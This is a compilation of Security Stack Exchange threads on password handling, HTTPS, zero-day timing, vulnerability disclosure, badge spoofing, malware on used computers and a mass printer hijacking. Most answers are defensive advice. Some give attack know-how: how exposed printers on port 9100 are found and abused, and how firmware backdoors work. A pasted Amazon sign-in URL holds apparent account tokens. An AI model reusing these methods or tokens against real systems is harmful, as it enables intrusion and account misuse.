Professional information, including information about your employer, in limited cases where you’ve connected your payroll accounts or provided us with your pay stub information. The data collected from your financial accounts includes information from all accounts (e.g., checking, savings, and credit card) accessible through a single set of account credentials . Also note how the scope of the information collected has expanded over time, by looking at the previous revisions of this answer. To make matters even worse, they can share all that information with their customers, i.e., the company that wants you to link with them. That means that when, e.g., your rent is paid via Plaid (my landlord uses a service that relies on Plaid), all of that information may be shared with that service! And while they, in turn, may not distribute that data further, you now have to trust another party that they are able to keep your data safe. Again, here's the relevant excerpt from that privacy statement (again, my italics): How We Share Your Information We share your End User Information for a number of business purposes: With the developer of the application you are using and as directed by that developer (such as with another third party if directed by you); To enforce any contract with you; With our data processors and other service providers, partners, or contractors in connection with the services they perform for us or developers; [...] In connection with a change in ownership or control of all or a part of our business (such as a merger, acquisition, reorganization , or bankruptcy); Between and among Plaid and our current and future parents, affiliates , subsidiaries and other companies under common control or ownership; As we believe reasonably appropriate to protect the rights, privacy, safety, or property of you, developers, our partners, Plaid, and others; or For any other notified purpose with your consent. | {
"source": [
"https://security.stackexchange.com/questions/198006",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/191699/"
]
} |
198,067 | There's this person online with whom I have only interacted a few times. They had asked me for a small favour, which I did. They then wanted to give me something in return as a thank you. They were going to post it, so they wanted my address. I am countries away and I'm not used to mail, especially international mail. I hate that I'm paranoid like this when I genuinely look forward to their gift, but I need to know to what extent do I share my details? | In the end, it all comes down to trust and risk. How much do you trust this person and how much do you want to give as far as details goes, what can someone do to harm you when they have your data? That you're asking here tells me you're not really sure if you can trust this person. There are risks involved (such as real life threats or maybe a possible scam) but it is not easy to identify risks without knowing the full situation, as you explained it rather vaguely. To me the whole situation sounds kinda phishy to be honest. Are you sure you didn't fall for a phishing or scam attempt by helping this other person? Most countries do have PO boxes and other rent-able post solutions such as Poste Restante (as suggested by Molot in the comments) so you don't have to give out your own personal details. | {
"source": [
"https://security.stackexchange.com/questions/198067",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/191779/"
]
} |
198,119 | Somehow related to this other question . I am dealing with the following case: a medium-large company (with about 200 on-premises employees) is applying the following procedure for all the newly recruited employees (immediately before their first day at the company): they generate a password for the user (NOT a change-at-first-login
one) they login on their laptop (impersonating the final user) they apply some configuration (e.g. they access their Outlook email in order to check that everything works) they change again the password (this time with a change-at-first-login one) the laptop is delivered to the user It appears that this procedure is quite common also in IT companies. I cannot say if the initial configuration, "in the name of user", is absolutely necessary or just dictated by convenience reasons (a fully working laptop is delivered to a non-IT user, preventing a lot of requests to the IT for fixing common issues), but there a few things that smell: if I should never tell an admin my password (as it has been answered
to the cited question) there is no reason that an admin knows my
password even at the very beginning of my work in that company I can accept that an admin knows my password (when he first creates my account or when he resets it) provided that it's a
change-at-first-login password (so that I have evidence that it's not
been used before). I suspect anyway that most legacy systems (like
AD) allow admins to reset passwords with great freedom (for example
resetting passwords without notifying the user, or without forcing
them to set a change-at-first-login one). Is it an accepted practice?
This seems completely different from what happens for example in
Google (no one knows my password, if an activity is detected I am
notified). Edit: to answer many comments that state that "the computer is not yours, it's the employer's computer, you should not have personal information on the company computer" I would like to point out that it's not a matter of personal information, but reserved information regarding the company business. So, if it's correct that I should not use my company email to receive my blood analysis results from my doctor, it's perfectly common that some reserved information about the company is exchanged between employee A and employee B. | If I should never tell an admin my password (as it has been answered
to the cited question) there is no reason that an admin knows my
password even at the very beginning of my work in that company One of the main reasons to this rule is that Admins should not access your confidential data such as mails, etc... Since there is no data associated with the account at the very beginning this is not an issue. they generate a password for the user (NOT a change-at-first-login one) Using a single sign-on password will ask for a normal password before one can change the configuration. So a password is needed before accessing the config. I suspect anyway that most legacy systems allow admins to reset
passwords with great freedom. Is it an accepted practice? This is an accepted practice. Not old systems but newer systems like Office 365 also allows the admins to reset the users password without notifying the user. However any such resets gets logged in the system and the admin will be held responsible for any issues. Also note that not all configurations can be changed at Admin level. Some things can only be performed by the user. Instead of telling each and every user to perform a set of steps, they are doing it ahead of time. Some other concerns of sharing a password do not apply here such as Reusing the password is irrelevant as the password is not yours. None of your personal information is associated with the password. To answer some comments, I suspect that "there is no data associated with the account at the
very beginning" it's not absolutely true: I could have some emails in
my mailbox (someone could have sent my some confidential info to my
email address, because the mailbox has been activated before I first
log in) by Diego Pascotto Mail Id should not be shared to anyone by the Admins before configuration. The mailbox must have been activated when setting up outlook. Email Ids are shared only after single sign-in password is set. Also as pointed out by James Snell , receiving an email within minutes of account creation is unlikely. A competent company has images, procedures, via automation that take
care of these things without ever logging in as the new user at any
time. by Sokel Small companies do not always invest in automating. If a company hires around 10 staff per year and each with a different role the effort required to bring automation and maintain it will be greater than the manual effort. Automation is only worth the effort when you are having job that is done repeatedly in large numbers. In other words, the effort required for automation should be less than what your effort required for manual work If the admin has had unmonitored access to your account at any point
in time; they could've set up anything under your name - preventing
any returns to them. by UKMonkey Any actions taken by the admins during this time can be linked back to them as it is clear that the account is not handed over to the user until the user resets the password using the single sign-on password. | {
"source": [
"https://security.stackexchange.com/questions/198119",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/191838/"
]
} |
198,134 | In security news, I faced a new term related to hash functions: it is reported that the "in-house hash function" used in IOTA platform is broken (i.e. Curl-P hash function). You can find the complete paper introducing the vulnerability here . But I do not understand if the term of "in-house" represents a specific type of hash function? And in general, what does "in-house" mean here? | From the explanation of in-house in the Cambridge Directory : "Something that is done in-house is done within an organization or business by its employees rather than by other people" . Here it means developing your own hash algorithm instead of using a public one. Usually that means that it is developed by only a few people with only limited expertise in the problem area and without any public input. Thus it is very likely that the self-developed one gets eventually broken once more experts in cryptography take a look at it. See also Why shouldn't we roll our own? and How valuable is secrecy of an algorithm? . | {
"source": [
"https://security.stackexchange.com/questions/198134",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/187204/"
]
} |
198,263 | I often establish Ubuntu- LAMP environments on which I host a few Drupal web applications that I myself own (I don't provide any hosting services and never done so in the past). Whenever I establish such an environment, the most fundamental security steps I take are these: ufw --force enable
ufw allow 22,25,80,443 # All allowed via both TCP/UPD as no restrictions were given;
apt update -y
apt upgrade unattended-upgrades sshguard After the 2017-2018 W3C / Google (?) reforms regarding browser support in HTTP, requiring or at least encouraging all of us to use TLS encryption confirmed with an SSL certificate for secured HTTP data transfer (HTTPS), I wonder if unsecured HTTP (typically via port 80) is still relevant at all to any of us. Notes: Each of my web apps has its own OpenSSL certificate I create with Certbot . The only web utility I use besides websites is either PHPMyAdmin/PHPMiniAdmin. My question Is it okay for me to remove port 80 from ufw allow 22,25,80,443 thus making my system even a tiny bit less "vulnerable"? Update per answers Answers recommend redirecting from port 80 to port 443 instead just blocking port 80. I think Certbot creates these redirects automatically so I'm covered if I keep port 80 open as recommended in the answers. | Google, the major search engine of the Internet (dwarfing both Bing and Yahoo), and the browser used by majority of Internet users, has been pushing for an HTTPS-only world by decreasing the page rank for sites that do not HTTPS, and adding a browser warning when a site is not secure. However, the ratio of HTTPS sites to not is still far too low to recommend an HTTPS-first policy for everyone, because users would pretty constantly get scary "certificate error" messages or "connection refused" errors. So, until Google recommends an HTTPS-first policy for browser connections, it's not likely that Firefox, Apple, or Microsoft will recommend such policies, either, and that is not likely until a decent majority (perhaps 70% or more) of top sites are HTTPS enabled, which would be a huge increase from the ~50% of top sites that have HTTPS today . Most users that intentionally or accidentally visit your HTTP site, if greeted with a "connection refused" error, will likely move on to another site. I don't have a good way to get concrete numbers here, but it would be likely that 70-90% of Internet users probably wouldn't figure out the site has no HTTP port without an automatic redirect; the remainder are probably either technically competent enough to realize they need HTTPS, or use HTTPS Everywhere, and wouldn't notice anyways. Definitely use HSTS, definitely 301 redirect to HTTPS resources (the 301 indicates a permanent move to browsers, so they will "remember" this preference), definitely advise your users to make sure they see a padlock and verify the certificate, etc. Do not block port 80 at this point, as the Internet simply is not ready for this yet. As far as I know, there are no major sites that have disabled HTTP and blocked port 80. If you do this, you'll be breaking user expectation (that the site will forward you to a secure site), and since most users won't know what to do here, because they won't get a friendly error message, will simply assume your site is broken and move on. | {
"source": [
"https://security.stackexchange.com/questions/198263",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/-1/"
]
} |
198,392 | I suppose the FBI receives email with attachments, like any other government agency: documents, resumes/CVs, etc. I also suppose they are very careful not to get infected, more than the average user, for obvious reasons. If I were to send an email to the FBI, attaching maybe a PDF with my resume/CV, how are they going to open it? So I wonder if US government agencies are known to use particular procedures or follow particular standards for dealing with emails safely. I also suppose what I'm asking is not secret information, given the large number of people involved (all the people who work in or for the government are expected to deal with emails safely). | While I cannot speak for every government agency everywhere, in highly secure environments, what I have seen [unable to disclose] is: sandbox email attachments no attachments but authorised, attributable file upload tools In each instance, the attachment is inspected and run in an isolated sandbox. The recipient only interacts with the file through this abstraction. Oftentimes, the content is extracted as text and reconstructed in a structured way, wherever that is possible. | {
"source": [
"https://security.stackexchange.com/questions/198392",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/175681/"
]
} |
198,398 | I bought a used computer that appears to be wiped clean, but can I be sure? | It all boils down to which kinds of threats you want to migitate against - a determined attacker has many more options of leaving malware on your computer than just your hard drive, but it's getting increasingly complex to do so. If you're a rocket scientist working on the newest version of ICBMs you have more to fear than a college student who uses their computer for a few class assignments and some of the newest games (but in the rocket scientist's case, you won't be allowed to use self-bought used computers anyway). Also, it depends a bit on how competent a presumed non-malicious previous owner was in protecting against malware. And of course, "wipe clean" can mean anything from "deleting personal files, then emptying the wastebasket" to "reinstall the OS" to "completely overwrite the disks with random data/zeroes, then do an install from scratch". The typical threats you should migitate against are random malware infections that the previous owner caught somehow. Wiping the disks clean, then reinstalling the OS should be enough to get rid of those. Some computers, mainly laptops, come with a "recovery partition" that allows you to quickly reset the computer to factory condition; I wouldn't use that. First, because a virus might have altered the install files as well to survive a reinstallation; second, these recovery partitions often come with a lot of crapware which the manufacturer installs because they're paid a few dollars by the crapware maker. Better download an installation DVD/USB medium from Microsoft/Ubuntu/whichever OS you're using, and do a fresh install from that. Besides that, there's many more locations that could have malware, but it's unlikely to find them on your used computer unless you are specifially targeted. The computer BIOS might be altered to do stuff even before booting, for example, it could have a keylogger trying to steal your passwords, or even keep a few cores of your CPU busy mining bitcoin for the previous owner. It can't hurt to check the manufacturer's website for the newest BIOS update, and flashing the newest version of it, even if that's the version you already (seem to) have. This is already quite paranoid, but still something you can do in a few minutes so doing it won't hurt you much. The hard drive firmware itself could be altered. Someone published a proof-of-concept a few years ago who installed Linux on the hard drive - no, the computer didn't run Linux; the hard drive itself ran Linux, ignoring the fact that it was supposed to be a hard drive (see http://spritesmods.com/?art=hddhack - on page 6, he adds a backdoor by replacing the root password hash with a known one every time the disk reads /etc/shadow, and on page 7, he boots a linux kernel on the disk itself). The CPU microcode itself could be altered to do .. stuff, including ignoring any further microcode updates. Unlikely that this could be done without cooperation from Intel, but still a possibility if the NSA is trying to target you. (However, if the NSA were targeting you, "hope he'll buy the spiked used computer we put on ebay for him" wouldn't be their primary strategy, I assume). So, if you're just a random guy, wiping the hard disks and doing an OS reinstall from scratch provides good protection against the kinds of threats you can reasonably expect.
However, if you have any reason to assume someone is actively targeting you - this includes MDs keeping patient data on their computers, credit card processors, ... - "Just don't buy used computers" is the first thing in a long chain of measures you need to take. | {
"source": [
"https://security.stackexchange.com/questions/198398",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/183656/"
]
} |
198,423 | I'm a bit new to security and trying to get the concepts properly. I'm wondering what exactly "signing" a file (a certificate, an apk file, or something else) means? Do we sign the whole file so it becomes sort of encrypted? Is there like a piece of plain text that we sign and pass it through, for example, a zip, and let the receiving side checks that piece based on a particular protocol before going any further? Or something else? As far as I can see, if we sign the whole file, then it can be more secure as the contents would be encrypted (or signed). But I've also seen/heard some examples in where you only sign a piece of text instead of the whole thing. Any ideas would be greatly appreciated. PS: I've already checked What does key signing mean? | Signing a file does not encrypt it. When Alice signs a file she usually signs the whole file. So she calculates a hash of the whole file and signs only the hash with her private key and attaches this piece of information to the file. Bob uses her public key to verify it and gets her calculated hash. He then calculates the hash of the file himself (without the signature of course) and checks both hashes. If they match its the same exact version of the file Alice sent. If they don't match Mallory could have changed it. The file itself never gets encrypted, and of course you can just remove the signature, but then it's not signed anymore (and therefore worthless). For more technical and detailled information please refer to forests answer: https://security.stackexchange.com/a/198473/191453 | {
"source": [
"https://security.stackexchange.com/questions/198423",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/183109/"
]
} |
198,468 | Are there any known cases of HTTPS websites leaking the private key of their SSL certificate? Is it even technically possible for a bad website admin to misconfigure a site to send the private key as part of the certificate chain? | Are there any known cases of HTTPS websites leaking the private key of their SSL certificate? Yes - the Heartbleed bug involved memory leaks out of the HTTP server such that: We attacked ourselves from outside, without leaving a trace. Without
using any privileged information or credentials we were able steal
from ourselves the secret keys used for our X.509 certificates, ... Aside from bugs like that, Is it even technically possible for a bad website admin to
misconfigure a site to send the private key as part of the certificate
chain? Sure. If you specify the wrong file in, for example, SSLCertificateChainFile then Boom! There goes the private key. As @duskwuff points out in the comments, there are protections against this. Neither Apache nor NGINX will send a key PEM that's included in a certificate file; they will silently strip it out (which, I'm willing to bet, is a protection put in place after some number of events where people did what I suggested might work). Other misconfigurations, such as incorrect web root combined with loose permissions or excessive web server privileges, will also leak the key, but those misconfigurations are both mundane and extreme (e.g., you really have to be trying to break things that badly). Doing so is not recommended. | {
"source": [
"https://security.stackexchange.com/questions/198468",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/56659/"
]
} |
198,541 | A company I used to work for developed a Point Of Sale system that also has an eCommerce portion. While working there, I discovered massive flaws with their security model. Simply put, there is 0 server side validation.
Any user, logged in or not, can do things like edit prices, fake transactions, mess with time sheets, etc all from the comfort of their home. I reported this several times verbally, but it was mostly ignored as not a priority. They have since expanded their clientele, and now serve quite a few clients.
I have verified that the exploits still work just as they did several years ago. I have no interest in saving face for this company, they treated me and many others very poorly and abusively, forcing overtime without pay and similar transgressions. What is the best way to report this security issue? Do I send an email to their clients? Or should I publicly disclose the attack and let the internet handle it? edit: I would like to add that the exploits are not complicated or obscure, anyone who opens devtools in their browser would be able to figure out that they can just edit the data on the fly edit 2: After reading all of these responses, I will be sending the company an anonymous email with a POC. I will also be giving them a 60 day period to address the issue before I report it to their customers | A quick word of caution You sound very invested in trying to do something. If I can be frank, it sounds like you are at least partially motivated by your frustrations with the way the company treated you as an employee. This can be understandable, but doesn't necessarily lead to good decisions. In particular one option you mention (contacting customers and informing them of the issues) is the sort of thing that, rightly or not, and regardless of how it might end, can result in lawsuits filed against you by your former employer. So tread lightly. All things considered that is probably a very bad idea. Understanding the (flawed) business perspective Unfortunately the situation you describe is not uncommon in the software industry. From the perspective of many companies, bring up security issues is asking them to spend real money (in terms of developer salaries) to fix a problem that they cannot see for a benefit that may not be needed for a long time (it may in fact be a while before someone tries to hack them). It's a hidden benefit with an upfront cost, and that is something that short-sighted thinking can easily ignore for a long time. After all, from their perspective, the things you are making a big deal about have never actually caused problems but will definitely take a lot of time and effort to fix, so why should they fix it? (I'm not saying they are right, I'm just explaining the thought process). It's important to understand that this is obviously the approach that your ex-employer is taking. You have informed them of the issue and they have decided to ignore it. There is no reason to think that any (legal) action you can take as an outsider is going to change that, especially since you failed to make any changes as an insider. Of course we know that with bad security practices, someone finding and exploiting a weakness is inevitable, especially if they start to see any real kinds of success (i.e. having a large customer base). As long as none of their customers take the time to delve into potential security concerns proactively (and most don't, because they don't know enough to look properly even if they do care), situations like this can go on for a surprisingly long time before it causes real problems. In the worst-case scenario this leads to situations like the equifax security breach . For smaller companies this can result in complete bankruptcy . Reality So what do you do about it? If management knows about the problem but refuses to change, there probably isn't anything you can do to force them to change. You can try things you mentioned like reporting this to their customers, but their customers may not take you seriously. For all they know you are simply a disgruntled ex-employee trying to cause trouble for your previous employer. If they didn't know enough to look into these things before starting to use the platform, then there is no reason to think they know enough to take your claims seriously now. More likely than not you'll just end up being ignored or sued. (per @forest's answer) You certainly should submit a CVE. You could also try submitting bugs through a third-party bug bounty program. There are some that have popped up in recent years and exist to try to act as a neutral arbiter between "independent security researchers" (aka you) and sites that otherwise don't have bug reporting programs (aka your former employer). Of course such programs work only if the company you are reporting bugs to actually listen. You already know that your former employer won't. However, having published and ignored vulnerabilities through standard channels will help their customers in the long run when they do get hacked. This will change the situation from simple incompetence to outright negligence, which comes with much stiffer financial penalties in civil court (FYI: IANAL). Any further (legal) options will vary depending on your jurisdiction, aka in Europe you may find some venues for legal action through the GDPR. In many places though you probably don't have any options that can immediately bring legal trouble to them. Most likely that won't happen until they get hacked and their customers sue. Having a published CVE will help their customers when that happens. In the meantime, it sounds like you are thinking about posting something publicly "on the internet". What would be your goal there? Realistically, your attempts to do that will probably just be ignored by the internet. It's possible however that they may end up hacked much sooner as a result though. Without going through more standard channels though, you probably dramatically increase your own risk of legal repercussions. Therefore, I would personally keep to official channels. Again, I may be misreading you, but I think your question is largely coming from the place of someone who is angry at a past-employer and is, to some extent, looking to cause trouble. That's a good way to get yourself in legal trouble or at least give yourself a bad name when trying to find jobs in the future. I think you should try to stop looking at this from the perspective of an ex-employee and focus more on the perspective of a neutral-security-researcher. | {
"source": [
"https://security.stackexchange.com/questions/198541",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/192298/"
]
} |
198,589 | We have a client who hosts an event, with a tight budget, that uses lanyarded Photo-ID cards with barcodes on them. The barcodes are used to gain access to various areas at the event. We were thinking of proposing a hashed code (currently the IDs are sequential), but then it occured that it's pretty easy to 'swipe' a card
with high resolution photography, and then overlay one's existing barcode with a printout of the swipe. Bearing in mind that we are using ean13 scanners, and there really is a tight budget (so NFC is out for the time being) - would an overlay, such as red cellophane, serve any purpose in mitigating this specific kind of attack? What actually happened This being the most popular post I have ever written on SE, I thought I may provide you with some follow-up. First of all, thank you all so much for your thoughts. It helped by providing us with a list of things not to do just as much as what to do, which was of great value. What we did Security was given access to cheap laptops with their EAN 13 scanners using a USB port. The laptops were signed in (under unique IDs) to our security app. The IDs used were generated using a well-designed RNG (not by me, so details are missing here - but it met a bunch of tests) which bore no relation to identities. There were just over 2,500 attendees over several days. We did not use anything to obscure the EAN 13: It was easy enough to duplicate them. However, that wasn't enough to gain entrance. On presentation and scan, the software (linked to our own monitoring service) checked the existence of the ID (fail #1), as to whether or not the ID had already been used (fail #2), and then returned the identity details (photo, name, etc) of the individual for whom that identity was attached. This last depended upon human check, (fail #3). We also had people attending who did not have a lanyard ("I lost it" / "I don't need one" / etc...) and they were deferred to a separate security building where they were issued their missing lanyard, after having provided an ID document (passport/license,etc.). As everyone needed an ID card - even VVIPs, there were no exceptions. Social hacking attempts were made - but they failed. Several VVIPs wanted their partners (unregistered) to attend and that was escalated to senior management where the decision was made) - about 50% of them were given new registrations and corresponding printed lanyards/IDs. About 50% were turned down. Duplicates did happen - which surprised us. Where it did occur, it was easy enough to identify whether or not they were the person that the card had been issued to. We also had cards from previous events. They looked different, and also their IDs were different. Some attendees had actually just brought the wrong lanyard - they were given a replacement at security. Others were turned away. I have to say that the security staff were incredibly professional - and they were treated very well by the event hosts, with meals laid on, and a free drinks bar for security at the end of the event. Access to the event was highly controlled. All entrances and exits, even if locked, where monitored. What we didn't do The security personnel were 100% trusted. There could have been an 'inside man/team' among them, but it would have been quite hard to orchestrate and we doubt that there would be sufficient motive. The security company had already performed vetting - and really wanted to win this work again for following years (as it had for previous years), so maybe there was much less risk there than I imagine. What I learned Defense in depth and real-life MFA were the two things I learned. Expecting a single part of the security system to be enough for the entire security system would have been an unnecessary mistake. Low tech is good, as long as it's used correctly, and without any ridiculous over-expectations. OMG look after the security staff well. Since they are our eyes and ears, we have every reason to keep them happy and loyal. TL;DR There is nothing wrong at all with unprotected barcodes as long as you don't expect them to do much. They were used for both security and comms, and (if we ever get back to non-lockdown events) we will probably introduce restriction zones also (which, apparently, was poorly done using an alternative system - not designed by our team). Everyone was safe, nobody was hassled, and it was a very successful event. | Simple answer: No If you can see it, you can photograph it. There have been countless attempts over the years to solve this part of DRM and all have failed. Instead of focusing on the barcode, have you considered making it difficult to copy the id card itself? So that security for each area can quickly check it isn't an overlay? For example a hologram over the barcode that the scanner ignores but a human can check, or a high quality plastic card with the barcode in the coloured coating - a guard can spot a fake overlay. | {
"source": [
"https://security.stackexchange.com/questions/198589",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/192343/"
]
} |
198,597 | While cleaning I've found an old cellphone. This phone does not turn on, and I'm not sure if contains personal data. I would like to throw away this phone, but I'm concerted if this data can be recovered some way. What could be the best way to securely destroy it? Not sure if relevant, it's an iPhone 3G. | Simple answer: No If you can see it, you can photograph it. There have been countless attempts over the years to solve this part of DRM and all have failed. Instead of focusing on the barcode, have you considered making it difficult to copy the id card itself? So that security for each area can quickly check it isn't an overlay? For example a hologram over the barcode that the scanner ignores but a human can check, or a high quality plastic card with the barcode in the coloured coating - a guard can spot a fake overlay. | {
"source": [
"https://security.stackexchange.com/questions/198597",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/16906/"
]
} |
198,726 | Suppose I am in a situation that I am forced to log in to my account using someone else's computer . Is there any secure way to do that so that I would be sure that my login details (i.e. password) are not recorded by any means (e.g. keystroke logging)? Or if it is impossible, what are the ways to at least mitigate the risks? Although related, but note that this is a bit different from this question since I am not using my own computer to log in. | This is an interesting question! The rule of thumb is that if someone else has control of the device (and they're determined enough), they will always be able to monitor and modify all of your actions on the device. We can (to a somewhat limited extent) get around this though! Two-factor authentication can be used to ensure that even if someone has your password, they cannot get into your account without also having access to a separate device (owned and controlled by you). Keep in mind that once you log in, the computer ultimately has control over your interaction with the website, and as a result it could trivially see everything you do on the site and even modify your requests to the site (including not logging you out properly when you're done, and potentially changing your login details to lock you out of your own account). This all depends on how worried you are about being attacked - if you're just logging into Facebook on a friends computer, you can probably trust that when you hit "Log Out", it actually logs you out. If you're logging into something really important, however, you may want to stick to devices you control. Additionally, consider the following, via user TemporalWolf Some websites allow for the generation of single-use one time passwords which sidesteps any sort of password logging... as you mentioned, this doesn't stop them from mucking with the now authenticated session. | {
"source": [
"https://security.stackexchange.com/questions/198726",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/113984/"
]
} |
198,780 | JavaScript has certain limitations such as preventing reading and writing to disk and not allowing access to other browser windows or domains. But is that all that's needed to prevent malicious code from running? JavaScript is pretty powerful, and it seems odd that browsers will unquestioningly run all JavaScript code they are given. How is that safe? | The standard is designed to be safe. The implementation may not be. The browser isolates JavaScript, as it executes within a browser process itself. It cannot do anything which is not permitted by the browser JavaScript interpreter or JIT compiler . However, owing to its complexity, it's not at all uncommon to find vulnerabilities that allow JavaScript to compromise the browser and gain arbitrary code execution with the privileges of the browser process. Because these types of security bugs are so common, many browsers will implement a sandbox. This is a protection mechanism that attempts to isolate a compromised browser process and prevent it from causing further harm. The way the sandbox works depends on the browser. Firefox has very limited sandboxing, whereas Chrome and Edge have significant sandboxing. However, despite this defense in depth, browser vulnerabilities can often be combined with sandbox escape vulnerabilities. See https://madaidans-insecurities.github.io/firefox-chromium.html for more information on Firefox vs Chromium. | {
"source": [
"https://security.stackexchange.com/questions/198780",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/183656/"
]
} |
198,951 | I am trying to understand why an attacker would want to wait to use a zero-day exploit. I have read that an attacker does not want to waste the zero-day because they are typically very expensive to obtain in the first place, but it is not clear to me what is meant by “waste” here. Zero-days can be discovered by the community (e.g. security researchers) which would render it useless. In this sense, the zero-day has been wasted by the inaction of the attacker. Is there a risk with using the zero-day exploit too soon? It seems that an attacker would want to minimize the chances of the zero-day being discovered, and thus use it as quickly as possible. Question: What factors would cause the attacker to wait to use a zero-day exploit? | It's more likely that you'll burn a 0day by using it than by sitting on it. There's a fine balance between sitting on a 0day so long that it gets discovered by someone else and patched, and using it too early and unnecessarily, burning it . The balance tends to weigh in favor of waiting longer, since a good 0day is going to be obscure enough that it won't be quickly found. The biggest risk actually isn't discovery in that case, but obsolescence when the vulnerable code is re-written or removed for completely unrelated reasons, and the 0day exploit no longer works. Most of the time, however, an attacker simply doesn't need to use it. If I have a valuable Linux local privilege escalation exploit, why would I use it when a little bit of extra reconnaissance tells me I can use an old exploit against an improperly patched privileged daemon? Better to keep it in the rainy day fund. There are a few other reasons 0days may be kept for long periods: Some people simply hoard 0days for the sake of it. This is all too common. Maybe you borrowed the 0day from someone, in which case burning it would piss them off. Sometimes a 0day broker is sitting on them while waiting for the right client. The 0day may be useless on its own, needing to be chained with other exploits to work. There was some interesting research presented at BH US which analyzed the life of 0days. | {
"source": [
"https://security.stackexchange.com/questions/198951",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/192714/"
]
} |
199,222 | Accessing web server log files via a URL has a certain appeal, as it provides easy access. But what are the security risks of allowing open access to log files? | There are clearly 2 different lines of defense here. First, highly sensitive data (secrets, typically passwords) should never be logged to avoid compromise through logs. But the more an attacker knows about a system, the higher the risk to build/use a targetted attack. For example software versions are not highly sensitive and can reasonably feed a log, but they can help in choosing an attack vector. So the second line of defense is that someone that does not need access to the logs should not be able to read them. That is a direct application of the least privilege rule. It is common to provide log access to the dev/maintenance team, but you should evaluate the risk/gain ratio, according to your access security tools. The most secure system is the one that cannot be accessed by any user, but its useability is very low too... | {
"source": [
"https://security.stackexchange.com/questions/199222",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/176713/"
]
} |
199,226 | Recently it got to my attention that someone has hacked around 50,000 printers and used them to print the message they wanted to. ( link ) As someone who doesn't have a lot of knowledge about networks or hacking, what would be the steps to take to protect my printer or similar accessories from such attacks in the future? | Don't leave your printer exposing port 9100 to the internet. This large-scale printer attack is nothing new. It's happened previously and is very simple to execute. The attacker likely used Shodan to scan the entire internet for printers with port 9100 open to the internet. Due to way RAW printing over port 9100 works, all is required after this is to connect to the printer on port 9100 TCP and send the text you want to send to the printer. Preventing this attack All you need to do is close port 9100 externally. If there is a requirement to print remotely, this is possible in a number of ways: Use a VPN to connect to the network, making the printer accessible as if it's in your local network Use a different printing protocol IPP . This is designed to be used over the internet and has built in support for authentication. Google Cloud Print | {
"source": [
"https://security.stackexchange.com/questions/199226",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/175806/"
]
} |
199,557 | Assume that my Internet history is made public (accidentally or on purpose). And this release is over 24 hours since the visits were made. Also, assume that there aren't embarrassing sites on there: there isn't any blackmail potential. (My most embarrassing page visited in the last week is actually the TV tropes page for my little pony , for which I have a valid reason and a witness). What potential attacks does this allow? I'm mildly concerned about seeing massive links like: hxxps://kdp.amazon.com/en_US/ap-post-redirect?openid.assoc_handle=amzn_dtp&aToken=Atza%7CIwEBIO9mWoekr9KzK7rH_Db0gp93sewMCe6UcFPm_MbUhq-jp1m7kF-x0erh6NbjdLX3bm8Gfo3h7yU1nBYHOWso0LiOyUMLgLIDCEMGKGZBqv1EMyT6-EDajBYsH21sek92r5aH6Ahy9POCGEplpeKBVrAiU-vl3uIfOAHihKnB5r2yXPytFCITXM70wB5HBT-MIX3F1Y2G4WfWA-EgIfZY8bLdLangmgVq8hE61eDIFRzcSDtAf0Sz7_zxm1Ix8lV8XFBS8GSML9YSwZ1Gq6nSt9pG7hTZoGQns9nzKLk7WpAWE8RazDLKxVJD-nDsQ9VdBJe7JZJtD7c77swkYneOZ5HXgeGFkGhKsMnP7GSYndXhC_PqzY251iDt0X7e5TWvh86WZA0tG2qZ_lyIagZtB3iw&openid.claimed_id=https%3A%2F%2Fwww.amazon.com%2Fap%2Fid%2Famzn1.account.AEK7TIVVPUJDAK3JIFQIQ77WZWDQ&openid.identity=https%3A%2F%2Fwww.amazon.com%2Fap%2Fid%2Famzn1.account.AEK7TIVVPUJDAK3JIFQIQ77WZWDQ&openid.mode=id_res&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.op_endpoint=https%3A%2F%2Fwww.amazon.com%2Fap%2Fsignin&openid.response_nonce=2018-12-11T13%3A46%3A52Z4004222742336216632&openid.return_to=https%3A%2F%2Fkdp.amazon.com%2Fap-post-redirect&openid.signed=assoc_handle%2CaToken%2Cclaimed_id%2Cidentity%2Cmode%2Cns%2Cop_endpoint%2Cresponse_nonce%2Creturn_to%2CsiteState%2Cns.pape%2Cpape.auth_policies%2Cpape.auth_time%2Csigned&openid.ns.pape=http%3A%2F%2Fspecs.openid.net%2Fextensions%2Fpape%2F1.0&openid.pape.auth_policies=http%3A%2F%2Fschemas.openid.net%2Fpape%2Fpolicies%2F2007%2F06%2Fnone&openid.pape.auth_time=2018-12-11T13%3A46%3A52Z&openid.sig=5cx5iHjeLyWTTA9iJ%2BucszunqanOw36djKuNF6%2FOfsM%3D&serial=&siteState=clientContext%3D135-4119325-2722413%2CsourceUrl%3Dhttps%253A%252F%252Fkdp.amazon.com%252Fbookshelf%253Flanguage%253Den_US%2Csignature%3DgqJ53erzurnmO1SPLDK1gLwh9%2FUP6rGUwGF2uZUAAAABAAAAAFwPv8dyYXcAAAAAAsF6s-obfie4v1Ep9rqj in my history and worrying that secure information might be passed in a URL somewhere. I am aware that this makes it easier to impersonate my identity, and I'm mostly interested in the leakage of information via the URL itself. I have a general interest, but this is motivated by a test project I'm running. | Your question might be more undefined than you realise. Any kind of data can be passed using URL parameters. Usernames, passwords, authentication tokens, settings, form data, or anything the web developer chooses. It's not always good practice to use URL parameters to for this, but it is always possible . And it's entirely up to each individual web developer on each individual page (not just site) as to what might be exposed and when. So you might not be able to predict what might be exposed. So, to answer your question, in the worst case, you could experience a complete and utter disclosure of any amount of personal data including credentials. By request, I did a search for the practice of "passwords in URL parameters" and restricted results to this year. Here's one of the top hits: https://answers.splunk.com/answers/622600/how-to-pass-username-and-password-as-a-parameter-v.html That's a forum from Feb 2018 